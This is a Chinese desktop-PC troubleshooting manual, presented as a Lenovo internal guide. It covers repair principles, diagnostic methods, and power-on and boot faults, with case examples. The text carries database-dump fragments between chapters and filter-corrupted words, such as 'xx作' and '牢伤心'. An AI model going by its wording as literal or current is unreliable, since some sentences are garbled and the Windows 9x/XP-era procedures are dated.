    1、如未安置驱动程序或驱动程序之间产生冲突，则在Windows 9x下的资源管理中可以发现一些标记，其中“？”表示未知设备，通常是设备没有正确安装，“！”表示设备间有冲突，“×”表示所安装的设备驱动程序不正确。
    2、病毒防治
    病毒对电脑的危害是众所周知的，轻则影响机器速度，重则破坏文件或造成死机。为方便随时对电脑进行保养和维护，必须准备工具如干净的DOS启动盘或Windows 98启动盘，以及杀病毒和磁盘工具软件等，以应付系统感染病毒或硬盘不能启动等情况。
    3、应收好各种配件的驱动程序，如光驱、声卡、显示卡、MODEM等的驱动程序，以防系统出现问题方便重新安装。


电脑故障维修判断指导大全（联想内部文件）

《一键清理系统垃圾》

电脑故障维修判断指导大全（联想内部文件）

第一部分---总则

第一章 电脑维修的基本原则和方法
这里所述原则、方法等是第二部分分类判断的基础，需要认真遵守执行。

§1.1 进行电脑维修应遵循的基本原则：
一、 进行维修判断须从最简单的事情做起
简单的事情，一方面指观察，另一方面是指简捷的环境。
简单的事情就是观察，它包括：
1、 电脑周围的环境情况——位置、电源、连接、其它设备、温度与湿度等；
2、 电脑所表现的现象、显示的内容，及它们与正常情况下的异同；
3、 电脑内部的环境情况——灰尘、连接、器件的颜色、部件的形状、指示灯的状态等；
4、 电脑的软硬件配置——安装了何种硬件，资源的使用情况；使用的是使种xx作系统，其上又安装了何种应用软件；硬件的设置驱动程序版本等。
简捷的环境包括：
1、 后续将提到的最小系统；
2、 在判断的环境中，仅包括基本的运行部件/软件，和被怀疑有故障的部件/软件；
3、 在一个干净的系统中，添加用户的应用（硬件、软件）来进行分析判断
从简单的事情做起，有利于精力的集中，有利于进行故障的判断与定位。一定要注意，必须通过认真的观察后，才可进行判断与维修。
二、 根据观察到的现象，要“先想后做”
先想后做，包括以下几个方面：
首先是，先想好怎样做、从何处入手，再实际动手。也可以说是先分析判断，再进行维修。
其次是，对于所观察到的现象，尽可能地先查阅相关的资料，看有无相应的技术要求、使用特点等，然后根据查阅到的资料，结合下面要谈到的内容，再着手维修。
最后是，在分析判断的过程中，要根据自身已有的知识、经验来进行判断，对于自己不太了解或根本不了解的，一定要先向有经验的同事或你的技术支持工程师咨询，寻求帮助。
三、 在大多数的电脑维修判断中，必须“先软后硬：
即从整个维修判断的过程看，总是先判断是否为软件故障，先检查软件问题，当可判软件环境是正常时，如果故障不能消失，再从硬件方面着手检查。
四、 在维修过程中要分清主次，即“抓主要矛盾“
在复现故障现象时，有时可能会看到一台故障机不止有一个故障现象，而是有两个或两个以上的故障现象（如：启动过程中无显，但机器也在启动，同时启动完后，有死机的现象等），为时，应该先判断、维修主要的故障现象，当修复后，再维修次要故障现象，有时可能次要故障现象已不需要维修了。

§1.2 电脑维修的基本方法
一、观察法
观察，是维修判断过程中第一要法，它贯穿于整个维修过程中。观察不仅要认真，而且要全面。要观察的内容包括：
1、 周围的环境；
2、 硬件环境。包括接插头、座和槽等；
3、 软件环境；
4、 用户xx作的习惯、过程
二、最小系统法
最小系统是指，从维修判断的角度能使电脑开机或运行的最基本的硬件和软件环境。最小系统有两种形式：
硬件最小系统：由电源、主板和CPU组成。在这个系统中，没有任何信号线的连接，只有电源到主板的电源连接。在判断过程中是通过声音来判断这一核心组成部分是否可正常工作；
软件最小系统：由电源、主板、CPU、内存、显示卡/显示器、键盘和硬盘组成。这个最小系统主要用来判断系统是否可完成正常的启动与运行。
对于软件最小环境，就“软件”有以下几点要说明：
1、 硬盘中的软件环境，保留着原先的软件环境，只是在分析判断时，根据需要进行隔离如卸载、屏蔽等）。保留原有的软件环境，主要是用来分析判断应用软件方面的问题
2、 硬盘中的软件环境，只有一个基本的xx作系统环境（可能是卸载掉所有应用，或是重新安装一个干净的xx作系统），然后根据分析判断的需要，加载需要的应用。需要使用一个干净的xx作系统环境，是要判断系统问题、软件冲突或软、硬件间的冲突问题。
3、 在软件最小系统下，可根据需要添加或更改适当的硬件。如：在判断启动故障时，由于硬盘不能启动，想检查一下能否从其它驱动器启动。这时，可在软件最小系统下加入一个软驱或干脆用软驱替换硬盘，来检查。又如：在判断音视频方面的故障时，应需要在软件最小系统中加入声卡；在判断网络问题时，就应在软件最小系统中加入网卡等。
最小系统法，主要是要先判断在最基本的软、硬件环境中，系统是否可正常工作。如果不能正常工作，即可判定最基本的软、硬件部件有故障，从而起到故障隔离的作用。
最小系统法与逐步添加法结合，能较快速地定位发生在其它板软件的故障，提高维修效率。
三、逐步添加/去除法
逐步添加法，以最小系统为基础，每次只向系统添加一个部件/设备或软件，来检查故障现象是否消失或发生变化，以此来判断并定位故障部位。
逐步去除法，正好与逐步添加法的xx作相反。
逐步添加/去除法一般要与替换法配合，才能较为准确地定位故障部位。
四、隔离法
是将可能防碍故障判断的硬件或软件屏蔽起来的一种判断方法。它也可用来将怀疑相互冲突的硬件、软件隔离开以判断故障是否发生变化的一种方法。
上提到的软硬件屏蔽，对于软件来说，即是停止其运行，或者是卸载；对于硬件来说，是在设备管理器中，禁用、卸载其驱动，或干脆将硬件从系统中去除。
五、替换法
替换法是用好的部件去代替可能有故障的部件，以判断故障现象是否消失的一种维修方法。好的部件可以是同型号的，也可能是不同型号的。替换的顺序一般为：
1、 根据故障的现象或第二部分中的故障类别，来考虑需要进行替换的部件或设备；
2、 按先简单后复杂的顺序进行替换。如：先内存、CPU，后主板，又如要判断打印故障时，可先考虑打印驱动是否有问题，再考虑打印电缆是否有故障，最后考虑打印机或并口是否有故障等；
3、 最先考查与怀疑有故障的部件相连接的连接线、信号线等，之后是替换怀疑有故障的部件，再后是替换供电部件，最后是与之相关的其它部件。
4、 从部件的故障率高低来考虑最先替换的部件。故障率高的部件先进行替换。
六、比较法
比较法与替换法类似，即用好的部件与怀疑有故障的部件进行外观、配置、运行现象等方面的比较，也可在两台电脑间进行比较，以判断故障电脑在环境设置，硬件配置方面的不同，从而找出故障部位。
七、升降温法
在上门服务过程中，升降温法由于工具的限制，其使用与维修间是不同的。在上门服务中的升温法，可在用户同意的情况下，设法降低电脑的通风能力，伤心电脑自身的发热来升温；降温的方法有：1）一般选择环境温度较低的时段，如一清早或较晚的时间；2）使电脑停机12~24小时以上等方法实现；3）用电风扇对着故障机吹，以加快降温速度。
八、敲打法
敲打法一般用在怀疑电脑中的某部件有接触不良的故障时，通过振动、适当的扭曲，甚或用橡胶锤敲打部件或设备的特定部件来使故障复现，从而判断故障部件的一种维修方法。
九、对电脑产品进行清洁的建议
有些电脑故障，往往是由于机器内灰尘较多引起的，这就要求我们在维修过程中，注意观察故障机内、外部是否有较多的灰尘，如果是，应该先进行除尘，再进行后续的判断维修。在进行除尘xx作中，以下几个方面要特别注意：
1、 注意风道的清洁
2、 注意风扇的清洁
风扇的清洁过程中，最好在清除其灰尘后，能在风扇轴处，点一点儿钟表油，加强润滑。
3、 注意接插头、座、槽、板卡金手指部分的清洁
金手指的清洁，可以用橡皮擦拭金手指部分，或用酒精棉擦拭也可以。
插头、座、槽的金属引脚上的氧化现象的去除： 一是用酒精擦拭，一是用金属片（如小一字改锥）在金属引脚上轻轻刮擦。
4、 注意大规模集成电路、元器件等引脚处的清洁
清洁时，应用小毛刷或吸尘器等除掉灰尘，同时要观察引脚有无虚焊和潮湿的现象，元器件是否有变形、变色或漏液现象。
5、 注意使用的清洁工具
清洁用的工具，首先是防静电的。如清洁用的小毛刷，应使用天然材料制成的毛刷，禁用塑料毛刷。其次是如使用金属工具进行清洁时，必须切断电源，且对金属工具进行泄放静电的处理。
用于清洁的工具包括：小毛刷、皮老虎、吸尘器、抹布、酒精（不可用来擦拭机箱、显示器等的塑料外壳）。
6、 对于比较潮湿的情况，应想办法使其干燥后再使用。可用的工具如电风扇、电吹风等，也可让其自然风干。
十、软件调试的几个方法和建议
1、 xx作系统方面。
主要的调整内容是xx作系统的启动文件、系统配置参数、组件文件、病毒等。
修复xx作系统启动文件。
1) 对于Windows 9x系统，可用SYS命令来修复（要保证MSDOS.SYS的大小在1KB以上），但要求，在修复之前应保证分区参数是正确的。这可使用诸如DiskMap之类的软件实现；
2) 对于Windows 2000/XP系统，有两种方法——修复启动文件，使用fixboot命令；修复主引导记录，使用fixmbr命令。
调整xx作系统配置文件。
A. 对于Windows 9x系统，可用的工具很多，如：Msconfig命令、系统文件检查器、注册表备份和恢复命令（scanreg.exe，它要求在DOS环境下运行。另外如果要用scanreg.exe恢复注册表，最好使用所列出的恢复菜单中的第二个备份文件）等；
B. 对于Windows 2000系统，可用的工具与Windows 9x相比比较少，但某些调试命令可用Win98中的一些命令（如win98下的Msconfig命令，就可用在windows 2000下）；
C. 对于Windows XP系统，可用的工具主要是Msconfig命令；
D. 调整电源管理和有关的服务，可以使用的命令是，要“运行”文本框中输入gpedit.msc来进行；
E. 所有xx作系统的调试，都可通过控制面板、设备管理器、计算机管理器（Windows 9x系统无）来进行系统的调试。
组件文件（包括.DLL、.VXD等）的修复
A. 通过添加删除程序来重新安装；
B. 通过从.CAB文件中提取安装；
C. 可用系统文件检查器（sfc.exe命令）来修复有错误的文件；
D. 从好的机器上拷贝覆盖。
检查系统中的病毒。
建议使用命令行方式下的病毒查杀软件，并能直接访问诸如NTFS分区。
2、 设备驱动安装与配置方面。
主要调整设备驱动程序是否与设备匹配、版本是否合适、相应的设备在驱动程序的作用下能否正常响应。
A. 最好先由xx作系统自动识别（特别要求的除外，如一些有特别要求的显示卡驱动、声卡驱动、非即插即用设备的驱动等），而后考虑强行安装。这样有利于判断设备的好坏；
B. 如果有xx作系统自带的驱动，则先使用，仍不能正常或不能满足应用需要，则使用设备自带的驱动；
C. 更换设备，应先卸载驱动再更换。卸载驱动，可从设备管理器中卸载；再从安全模式下卸载；进而在INF目录中删除；最后通过注册表卸载；
D. 更新驱动时，如直接升级有问题，须先卸载再更新。
3、 磁盘状况方面。
检查磁盘上的分区是否能访问、介质是否有损坏、保存在其上的文件是否完整等。
可用的调整工具：
A. DiskMap，方便地找回正确的分区；
B. Fdisk及Fdisk /MDR，检查分区是否正确及使主引导记录恢复到原始状态；
C. 当硬盘容量大于64GB时，如果要重新分区或查看分区，要求使用随机附带的磁盘分区软盘中的Fdisk命令。这个命令可用windows Me下的Fdisk命令来代替；
D. format、Scandisk、厂商提供的磁盘检测程序，检查磁盘介质是否有坏道；
E. 文件不完整时，要求对不完整的文件先进行改名，再用在“xx作系统方面”中所述的方法重建。
4、 应用软件方面。
如应用软件是否与xx作系统或其它应用有兼容性的问题、使用与配置是否与说明手册中所述的相符、应用软件的相关程序、数据等是否完整等；
5、 BIOS设置方面。
1) 在必要时应先恢复到最优状态。建议：在维修时先把BIOS恢复到最优状态（一般是出厂时的状态），然后根据应用的需要，逐步设置到合适值。
2) BIOS刷新不一定要刷新到最新版，有时应考虑降低版本。
6、 重建系统。
在硬件配置正确，并得到用户许可时，可通过重建系统的方法来判断xx作系统之类软件故障，在用户不同意的情况下，建议使用自带的硬盘，来进行重建系统的xx作。在这种情况下，最好重建系统后，逐步复原到用户原硬盘的状态，以便判断故障点。
1) 重建系统，须以一键恢复为主，其次是恢复安装，最后是完全重新安装。恢复安装的方法：
对于Windows 9x系统，直接从光盘安装，或执行tools\\sysrec\\pcrestor.bat，即可实现恢复安装。在进行恢复安装时，可能由于win.com的存在而影响安装过程的正常进行，这时，可在Windows目录下，删除win.com后，再重新安装。
另一种恢复安装，是将根目录下的System.1st改名为System.dat后覆盖掉Windows目录下的同名文件，之后重启即可。但这种方法，不是真正意义上的重新安装，而类似于完全重新安装。
对于Windows XP或Windows2000系统，直接使用其安装光盘启动，在安装界面中选择修复安装，选择R时会出现两个选项：一是快速修复，对于简单问题用此选择；另一是故障修复台，只要选择正确的安装目录就可启用故障修复台。故障修复台界面类似于DOS界面。
2) 为保证系统干净，在安装前，执行Fdisk /MBR命令（也可用Clear.com）。必要时，在此之后执行format <驱动器盘符> /u [/s]命令。
3) 一定要使用随机版的或正版的xx作系统安装介质进行安装。
','2004-8-25 8:54:57','face1.gif','*.*.*.*','85',1,0,75,1,'管理员','32','32','582','2004-8-24','2280','4765','1659','2000-01-01','1',0,'0','level10.gif',1,'2005-2-5 8:03:45','0',0,'tablebody1','1','0')); 第二章 电脑维修步骤与维修xx作注意事项
§2.1 电脑维修步骤
对电脑进行维修，应遵循如下步骤：
一、了解情况
即在服务前，与用户沟通，了解故障发生前后的情况，进行初步的判断。如果能了解到故障发生前后尽可能详细的情况，将使现场维修效率及判断的准确性得到提高。了解用户的故障与技术标准是否有冲突。
向用户了解情况，应借助第二部分中相关的分析判断方法，与用户交流。这样不仅能初步判断故障部位，也对准备相应的维修备件有帮助。
二、复现故障
即在与用户充分沟通的情况下，确认：
1. 用户所报修故障现象是否存在，并对所见现象进行初步的判断，确定下一步的xx作；
2. 是否还有其它故障存在。
三、判断、维修
即对所见的故障现象进行判断、定位，找出产生故障的原因，并进行修复的过程。在进行判断维修的过程中，应遵循下面一节“维修判断”中所述的原则、方法、注意事项，及第二、三部分所述内容进行xx作。
四、检验
1. 维修后必须进行检验，确认所复现或发现的故障现象解决，且用户的电脑不存在其它可见的故障。电脑整机正常的标准，参见《联想台式电脑整机检验规范》；
2. 必须按照《XX维修检验确认单》所列内容，进行整机验机，尽可能消除用户未发现的故障，并及时排除之。
§2.2 电脑维修xx作
在维修过程中，下列各条款应引起切实的关注和注意。
一、在进行故障现象复现、维修判断的过程中，应避免故障范围扩大；
二、在维修时，须查验、核对装箱单及配置；
三、必须充分地与用户沟通。了解用户的xx作过程、出故障时所进行过的xx作、用户使用电脑的水平等。
四、维修中第一要注意的就是观察——观察、观察、再观察！！！
1. 周围环境：电源环境、其它高功率电器、电、磁场状况、机器的布局、网络硬件环境、温湿度、环境的洁净程度；安放电脑的台面是否稳固。周边设备是否存在变形、变色、异味等异常现象；
2. 硬件环境：机箱内的清洁度、温湿度，部件上的跳接线设置、颜色、形状、气味等，部件或设备间的连接是否正确；有无错误或错接、缺针/断针等现象；用户加装的与机器相连的其它设备等一切可能与机器运行有关的其它硬件设施；
3. 软件环境：
A. 系统中加载了何种软件、它们与其它软、硬件间是否有冲突或不匹配的地方；
B. 除标配软件及设置外，要观察设备、主板及系统等的驱动、补丁是否安装、是否合适；要处理的故障是否为业内公认的BUG或兼容问题；用户加装的其它应用与配置是否合适；
4. 加电过程中的观察：元器件的温度、异味、是否冒烟等；系统时间是否正确；
5. 拆装部件时的观察：要有记录部件原始安装状态的好习惯，且要认真观察部件上元器件的形状、颜色、原始的安装状态等情况；
6. 观察用户的xx作过程和习惯，及是否符合要求等。
五、在维修前，如果灰尘较多，或怀疑是灰尘引起的，应先除尘
六、对于自己不熟悉的应用或设备，应在认真阅读用户使用手册或其它相关文档后，才可动手xx作。
七、平时要多注意通过《技术直通车》、《技术工程信息通报》等下发的技术资料及其他工程师们的经验来积累自己的经验和提高维修水平。
八、禁止维修工程师为用户安装地线。如用户要安装地线，请用户联系正式电工为其安装。
九、如果要通过比较法、替换法进行故障判断的话，应先征得用户的同意。
十、在进行维修判断的过程中，如有可能影响到用户所存储的数据，一定要在做好备份、或保护措施、并征得用户同意后，才可继续进行。
十一、当出现大批量的相似故障（不仅是可能判断为批量的故障）时，一定要对周围的环境、连接的设备，以及与故障部件相关的其它部件或设备进行认真的检查和记录，以找出引起故障的根本原因。
十二、随机性故障的处理思路。随机性故障是指：随机性死机、随机性报错、随机性出现不稳定现象。对于这类故障的处理思路应该是：
1. 慎换硬件，特别是上门服务时。一定要在充分的软件调试和观察后，在一定的分析基础上进行硬件更换。如果没有把握，最好在维修站内进行硬件更换xx作。
2. 以软件调整为主。调整的内容有：
1） 设置BIOS为出厂状态（注意BIOS开关位置）
2） 查杀病毒
3） 调整电源管理
4） 调整系统运行环境
5） 必要时做磁盘整理，包括磁盘碎片整理、无用文件的清理及介质检查（注意，应在检查磁盘分区正常及分区中空余空间足够的情况下进行）。
6） 确认有无用户自加装的软硬件，如果有，确认其性能的完好性/兼容性。
7） 与无故障的机器比较、对比。这种对比的一种方法是，在一台配置与故障机相同的无故障机器上，逐个插入故障机中的部件（包括软件），查看无故障机的变化，当在插入某部件后，无故障机出现了与故障机类似的现象，可判该部件有故障。注意这种方式的对比，应做得彻底，以防漏掉可能有两种部件引起同一故障的情况。
十三、应努力学习相关技术知识、掌握xx作系统的安装、使用方法及配置工具的使用等；理解各配置参数的意义与适用的范围。
十四、请求支持需要关注的内容
1. 硬件及配置信息（尽可能详尽）
2. 软件及配置信息（尽可能详尽）
3. 周围环境
4. 完整的故障现象描述。即用户第一次报修时的故障现象，经过维修xx作后故障现象的变化情况。（清晰的描述）
5. 做过的维修xx作（要详尽）

§2.3 电脑维修的基本思路
为帮助维修工程师，顺利找到第二部分中的相关内容，在这里列出基本的判断思路，供参考使用。
','2004-8-25 8:55:30','face1.gif','*.*.*.*','85',1,0,75,2,'管理员', 第二部分 常见故障判断
本部分将计算机从开机一直到关机期间的故障进行分类。每一类的判断、定位过程都是第一部分中“维修判断”一节的有机组成部分，即不论使用什么方法或不论去判断什么内容，这两部分总是相互结合使用的。
以下各故障类型中所列的故障现象只是众多故障现象中的一部分，对于未列出的故障现象，有的可归类到其中，有的无法归类。因此，本手册只针对已列出的及可归类其中的故障现象提供相应的判断的方法和思路，并提供基本的排除的方法。而对不能归类其中的其它故障现象来说，我们会在今后的工作中不断的收集、整理总结，然后对本《台式电脑维修指导手册》进行丰富。

第一章 加电类故障
一、定义举例
从上电（或复位）到自检完成这一段过程中电脑所发生的故障。
二、可能的故障现象
1、 主机不能加电（如：电源风扇不转或转一下即停等）、有时不能加电、开机掉闸、机箱金属部分带电等；
2、 开机无显，开机报警；
3、 自检报错或死机、自检过程中所显示的配置与实际不符等；
4、 反复重启；
5、 不能进入BIOS、刷新BIOS后死机或报错；CMOS掉电、时钟不准；
6、 机器噪音大、自动（定时）开机、电源设备问题等其它故障。
三、可能涉及的部件
市电环境；电源、主板、CPU、内存、显示卡、其它可能的板卡；BIOS中的设置（可通过放电来回复到出厂状态）；开关及开关线、复位按钮及复位线本身的故障。
四、判断要点/顺序。
以下的文字叙述部分是对维修判断流程的补充和说明，要结合流程图来阅读。另外，本章只分析加电类的故障，如果在判断中涉及其它类故障，可转入相应故障的判断过程。以下各类同。
1、 维修前的准备
1) POST卡；
2) 万用表；
3) 试电笔；
4) CPU负载。
2、 环境检查
1) 检查电脑设备：
A. 周边及电脑设备内外是否有变形、变色、异味等现象；
B. 环境的温、湿度情况；
C. 加电后，注意部件、元器件及其它设备是否变形、变色、异味、温度异常等现象发生。
2) 检查市电情况：
A. 检查市电电压是否在220V±10%范围内，是否稳定（即是否有经常停电、瞬间停电等现象）；
B. 市电的接线定义是否正确（即，左零右火、不允许用零线作地线用（现象是零地短接）、零线不应有悬空或虚接现象）；
C. 供电线路上是否接有漏电保护器（且必须接地火线上），是否有地线等；
D. 主机电源线一端是否牢伤心地插在市电插座中，不应有过松或插不到位的现象，另一端是否可伤心在接在主机电源上，不应有过松或插不到位的情况。
3) 检查电脑内部连接：
A. 电源开关可否正常的通断，声音清晰，无连键、接触不良现象；
B. 其它各按钮、开关通断是否正常；
C. 连接到外部的信号线是否有断路、短路等现象；
D. 主机电源是否已正确地连接在各主要部件，特别是主板的相应插座中；
E. 板卡，特别是主板上的跳接线设置是否正确。
4) 检查部件安装：
A. 检查机箱内是否有异物造成短路；
B. 或零部件安装上是否造成短路（如P4CPU风扇在主板背面的支架安装错位造成的短路等）；
C. 通过重新插拔部件（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查部件安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；
D. 检查内存的安装，要求内存的安装总是从第一个插槽开始顺序安装。如果不是这样，请重新插好。
5) 检查加电后的现象：
A. 按下电源开关或复位按钮时，观察各指示灯是否正常闪亮；
B. 风扇（电源的和CPU的等）的工作情况，不应有不动作或只动作一下即停止的现象；
C. 注意倾听风扇、驱动器等的电机是否有正常的运转声音或声音是否过大；
D. 主机能加电，但无显示，应倾听主机能否正常自检（即有自检完成的鸣叫声，且硬盘灯能不断闪烁）若有，先检查显示系统是否有故障，否则检查主机问题；
E. 对于开机噪音大的问题，应分辨清噪音大的部位，一般情况下，噪音大的部件有风扇、硬盘、光驱和软驱动机械部件。对于风扇，应通过除尘来检查，如果噪音减小，可在风扇轴处滴一些钟表油，以加强润滑。
3、 故障判断要点
1) 检查主机电源：
A. 主机电源在不接负载时，将电源到主板的插头中绿线与黑线直接短接，看能否加电，并用万用表检查是否有电压输出；
B. 用万用表检查输出的各路电压值是否在规格允许的范围内；
C. 在接有负载的情况下，用万用表检查输出电源的波动范围是否在超出允许范围；
D. 对于电源一加电，只动作一下即停止工作的情况，应首先判断电源空载或接在其它机器上是否能正常工作（即检查上面提到的三点）；
E. 如果电脑的供电不是直接从市电来，而是通过稳压设备获得，要注意用户所用的稳压设备是否完好、或是否与我们的产品的电源兼容。
2) 在开机无显时，用POST卡检查硬件最小系统中的部件是否正常
A. 查看POST显示的代码是否为正常值（参见《维修工具使用手册》中的代码定义）；
B. 对于POST卡所显示的代码，应检查与之相关的所有部件。如显示的代码与内存有关，就应检查主板和内存；
C. 倾听在硬件最小系统下，有无报警声音，若无检查的重点应在最小系统中的部件上；
D. 检查中还应注意的是，当硬件最小系统有报警声时，要求插入无故障的内存和显示卡（集成显示卡除外），若此时没有报警音，且有显示或自检完成的声音，证明硬件最小系统中的部件基本无故障，否则，应主要检查主板；
E. 在准备更换CPU来检查时，应先使用CPU负载，检查主板的供电电压是否在允许范围内，在电压正常的情况下才可进行CPU更换xx作。如果超出范围，直接更换主板。CPU电压允许值参见《维修工具使用手册》；
3) 部件的检查：
A. 如果硬件最小系统中的部件经POST卡检查正常后，要逐步加入其它的板卡及设备，以检查其中哪个部件或设备有问题；
B. 对于总是通过重新插拔来解决加电故障的部件，应检查部件的后档板尺寸是否不太合适，这可通过去掉后档板检查。
4) BIOS设置检查：
A. 通过清CMOS检查故障是否消失；
B. BIOS中的设置是否与实际的配置不相符（如：磁盘参数、内存类型、CPU参数、显示类型、温度设置等）；
C. 根据需要更新BIOS检查故障是否消失。
5) 其它方面的检查：
A. 在接有漏电保护器的环境中，一定要先检查市电插座上的接线是否正确（即按左零右火，上地的连接方法；零地线不可短接；零线不能悬空），再检查漏电保护器是否正确地接在火线上、容量是否过小，接着检查在一路市电线路上所接的设备的数量（特别是电脑的数量——在漏电保护器的动作电流为30mA时，应可接16~20台电脑），最后检查整机设备中有无漏电或漏电流过大的现象；
B. 检查用户环境中有无地线。在无地线的环境中，触摸主机的金属部分，会有麻手的感觉。这时，如果接地后，机器可正常运行，且麻手现象消失，则属正常现象，不是故障；
C. 对于不能进BIOS，或不能刷新BIOS的情况，可先考虑主板的故障；
D. 对于反复重启或关机的情况，除注意市电的环境（如插头是否插好等）外，要注意电源或主板是否有故障；
E. 系统中是否加载有第三方的开关机控制软件，有应予以卸载。
五、本类故障的判断流程
见附录一之（一）。
六、案例
案例一：
问题描述：双子恒星6C/766的机器，主板是精英P6SEP-ME V2.2D，当内存不插在DIMM1时，开机无显示，但机器不报警。
解决方案：经测试，当DIMM1上不插内存时，即使DIMM2、DIMM3都插上内存，开机也是无显。当DIMM1插上内存时，不管DIMM2、DIMM3上是否插有内存，开机正常。
查询早期的周报得知，此问题是由于此机型集成的显卡使用的显存是共享物理内存的，而显存所要求的物理内存是要从插在DIMM1上内存中取得，当DIMM1上没有插内存时，集成显卡无法从物理内存中取得显存，故用户开机时无显。

案例二：
问题描述：每次计算机开机自检时，系统总会在显示512K Cache的地方停止运行了，是什么原因？
解决方案：首先既然在显示缓存处死机，必然是该处或其后的部分有问题。记得平常开机，此项显示完后就轮到硬盘启动xx作系统了。因此，可以断定不是高速缓存的问题，就是硬盘的故障。取下硬盘安装到别的电脑上，证实硬盘是好的。这是检查计算机故障最常用的办法——替换排除法。
现在我们把注意力集中到高速缓存上，进入CMOS设置，禁止L2 Cache，存盘退出，重启机器，电脑就可以正常工作了，可以断定是L2 Cache的问题。
触摸主板上的高速缓存芯片，发现有些芯片很热，估计就是这儿的问题。再次确认问题所在没错。
触类旁通：若发现机器总死机，可运行一会后，用手触摸主板上的高速缓存芯片，发现烫手，就可在Cmos中关闭二级缓存，发现是否死机，最后定义故障所在。

案例三：
问题描述：用户使用T启天2600 P4 1.6G 12840DSF(特5409)计算机，开机无显示，用户现在咨询如何解决？
解决方案：检查用户的环境，发现用户机随机附带两块显卡——主板集成一个显卡另外还有一块单独的TNT2 M64 32M显卡，有些客户在刚刚购买电脑时由于对电脑不太熟悉，将显示器信号线接到了主板集成的显卡接头上，这样会导致开机无显，但是此时主机工作正常。
遇到用户报修开机无显或显示器故障，请提示客户检查环境，若有不正确，提示更正后，问题即可解决。 第二章 启动与关闭类故障
一、定义举例
与启动、关闭过程有关的故障。启动是指从自检完毕到进入xx作系统应用界面这一过程中发生的问题；关闭系统是指从点击关闭按扭后到电源断开之间的所有过程。
二、可能的故障现象
1、 启动过程中死机、报错、黑屏、反复重启等；
2、 启动过程中报某个文件错误；
3、 启动过程中，总是执行一些不应该的xx作（如总是磁盘扫描、启动一个不正常的应用程序等）；
4、 只能以安全模式或命令行模式启动；
5、 登录时失败、报错或死机；
6、 关闭xx作系统时死机或报错。
三、可能涉及的部件
BIOS设置、启动文件、设备驱动程序、xx作系统/应用程序配置文件；电源、磁盘及磁盘驱动器、主板、信号线、CPU、内存、可能的其它板卡。
四、判断要点/顺序
1、 维修前的准备
1) 磁盘数据线；
2) 万用表；
3) 查毒软件。
2、 环境检查
1) 机器周边及外观检查：
A. 市电连接是否牢伤心，不应有过松或插不到位的现象；
B. 主机硬盘指示灯是否正确闪亮，不应有不亮或常亮的现象；
C. 观察系统是否有异味，元器件的温度是否偏高；
D. 观察CPU风扇的转速是否不够，或是否过慢或不稳定；
E. 倾听驱动器工作时是否有异响。
2) 驱动器连接检查：
A. 驱动器的电源连接是否正确、牢伤心。驱动器上的电源连接插座是否有虚接的现象；
B. 驱动器上的跳线设置是否与驱动器连接在电缆上的位置相符；
C. 驱动器数据电缆是否接错或漏接，规格是否与驱动器的技术规格相符（如：支持DMA66的驱动器，必须使用80芯数据电缆）；
D. 驱动器数据电缆是否有故障（如露出芯线、有死弯或硬痕等），除可通过观察来判断外，也可通过更换一根数据电缆来检查；
E. 驱动器是否通过其它板卡连接到系统上，或通过其它板卡（如硬盘保护卡，双网隔离卡等）来控制。
3) 检查其它部件的安装：
A. 通过重新插拔部件（包括CPU、内存），检查故障是否消失（重新插拔前，应该先做除尘和清洁金手指工作，包括插槽）。如果总是通过重新插拔来解决，应检查部件安装时，是否过松、后档板尺寸是否不合适、插座太紧，以致插不到位或被挤出；
B. 检查CPU风扇与CPU是否接触良好。最好重新安装一次。
4) 显示的内容的观察：要注意屏幕报错的内容、死机的位置，以确定故障可能发生的部位。
3、 故障判断要点
1) 充分地与用户沟通，了解出现不能启动的过程及用户的xx作；
2) BIOS设置检查：
A. 是否为刚更换完不同型号的硬件。如果主板BIOS支持BOOTEasy功能或BIOS防写开关打开，则建议将其关闭，待完成一次完整启动后，再开启；
B. 是否添加了新硬件。这时应先去除添加的硬件，看故障是否消失，若是，检查添加的硬件是否有故障，或系统中的设置是否正确（通过对比新硬件的使用手册检查）；
C. 检查BIOS中的设置，如：启动顺序、启动磁盘的设备参数等。建议通过清CMOS来恢复；
D. 检查是否由于BIOS问题（包括设置及功能）引起xx作系统不能正常启动或关闭，可偿试将Windows目录下的BIOS.vxd（或VPBIOSD.vxd）改名为BIOS.old，然后重启，或关闭，若故障消失，则通过修改BIOS设备或更新BIOS来解决，否则与BIOS无关。注意测试完成以后，一定要将其改回原来的名字（注：除Windows 98外，其它xx作系统无此文件）；
E. 在某些特殊情况下，应考虑升级BIOS来检查。如：对于在第一次开机启动后，某些应用或设备不能工作的情况，除检查设备本身的问题外，就可考虑更新BIOS来解决。
以下检查应在软件最小系统下进行。
3) 磁盘逻辑检查：
A. 根据启动过程中的错误提示，相应地检查磁盘上的分区是否正确、分区是否激活、是否格式化；
B. 直接检查硬盘是否已分区、格式化；
C. 加入一个其它无故障的驱动器（如软驱或光驱）来检查能否从其它驱动器中启动（若使用软驱，最好使用希捷的检测软盘启动）。若能，进行第3）、4）步的检查，否则进行第5）步的检查；接着、分区是否激活、有无坏道等；
D. 硬盘上的启动分区是否已激活，其上是否有启动时所用的启动文件或命令；
E. 检查硬盘驱动器上的启动分区是否可访问，若不能，用相应厂商的磁盘检测程序检查硬盘是否有故障。有故障，更换硬盘；在无故障的情况下，通过初始化硬盘来检测，若故障依然存在，更换硬盘；
F. 在用其它驱动器也不能启动时，先将硬盘驱动器去除，看是否可启动，若仍不能，应对软件最小系统中的部件进行逐一检查，包括硬盘驱动器和磁盘传输的公共部件——磁盘接口、电源、内存等。若可启动了，最好对硬盘进行一次初始化xx作，若故障不消失，则再更换硬盘；
G. 如果要对硬盘进行初始化xx作，但用户存有有用数据，建议用户找数据修复公司解决。
4) xx作系统配置检查：
A. 对于出现文件错误的提示，应按照在第一部分中提到的相应软件调试方法来修复文件；
B. 在不能启动的情况，建议进行一次“选择上一次启动”或用scanreg.exe恢复注册表到前期备份的注册表的方法检查故障是否能够消除；
C. 检查系统中有无第三方程序在运行，或系统中不当的设置或设备驱动引起启动不正常。在这里特别要注意Autoexec.bat和Config.sys文件，应屏蔽这两个文件，检查启动故障是否消失；
D. 检查启动设置、启动组中的项、注册表中的键值等，是否加载了不必要的程序；
E. 检查是否存在病毒。要求在一个系统中，只能安装一个防病毒软件；
F. 必要时，通过一键恢复、恢复安装等方法，检查启动方面的故障；
